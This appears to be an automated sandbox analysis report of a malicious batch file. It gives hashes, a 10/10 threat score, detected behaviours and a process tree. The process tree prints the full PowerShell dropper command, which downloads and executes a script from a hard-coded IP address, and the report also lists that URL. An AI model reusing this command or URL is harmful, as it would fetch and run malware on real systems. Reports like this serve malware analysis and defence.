Analysis
max time kernel: 99s
max time network: 150s
platform: windows10_x64
resource: win10v191014
submitted: 10-02-2020 21:10

Static task: static1

Behavioral task: behavioral1
Sample: 4jD1biG2.bat
Resource: win7v191014 (windows7_x64)
0 signatures, 0 seconds

Behavioral task: behavioral2
Sample: 4jD1biG2.bat
Resource: win10v191014 (windows10_x64)
0 signatures, 0 seconds
General
Target: 4jD1biG2.bat
Size: 191B
MD5: 6097db04a430a1a65515bae911e13c6e
SHA1: 41f39ba8f63c6ff8067348f596155beb32c45f17
SHA256: 5743310e1c2bd52d3abf50fa874a206e42a4aac4e182447e99f3cf32be4334ed
SHA512: 22fd4f652757e39fca2fa7b8a5d51cf951b76b200764b0ad45aa01cd38f9cbfb63df5542f08606fc198857cdecf1e4fd14d1cd005805203469b9dbb9a52ed777
Score: 10/10
Malware Config
Extracted
Language: ps1
Source: ps1.dropper
URLs: http://185.103.242.78/pastes/4jD1biG2
Signatures

Program crash (1 IoC)
Processes: WerFault.exe (PID 1464)

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
  WerFault.exe (PID 1464): Token: SeRestorePrivilege
  WerFault.exe (PID 1464): Token: SeBackupPrivilege
  WerFault.exe (PID 1464): Token: SeDebugPrivilege

Suspicious behavior: EnumeratesProcesses (18 IoCs)
Processes: WerFault.exe (PID 1464), 18 occurrences

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
  WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
  WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

Enumerates system info in registry (2 TTPs, 2 IoCs)
Processes:
  WerFault.exe: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
  WerFault.exe: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
Processes

C:\Windows\system32\cmd.exe (PID 5104)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\4jD1biG2.bat"

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2024)
  Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/4jD1biG2');Invoke-PBEESOQZ;Start-Sleep -s 10000"

    C:\Windows\SysWOW64\WerFault.exe (PID 1464)
    Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 2024 -s 704
    Signatures: Program crash; Suspicious use of AdjustPrivilegeToken; Suspicious behavior: EnumeratesProcesses; Checks processor information in registry; Enumerates system info in registry

\??\c:\windows\system32\taskhostw.exe (PID 4512)
Command line: taskhostw.exe -RegisterDevice -SettingChange -Full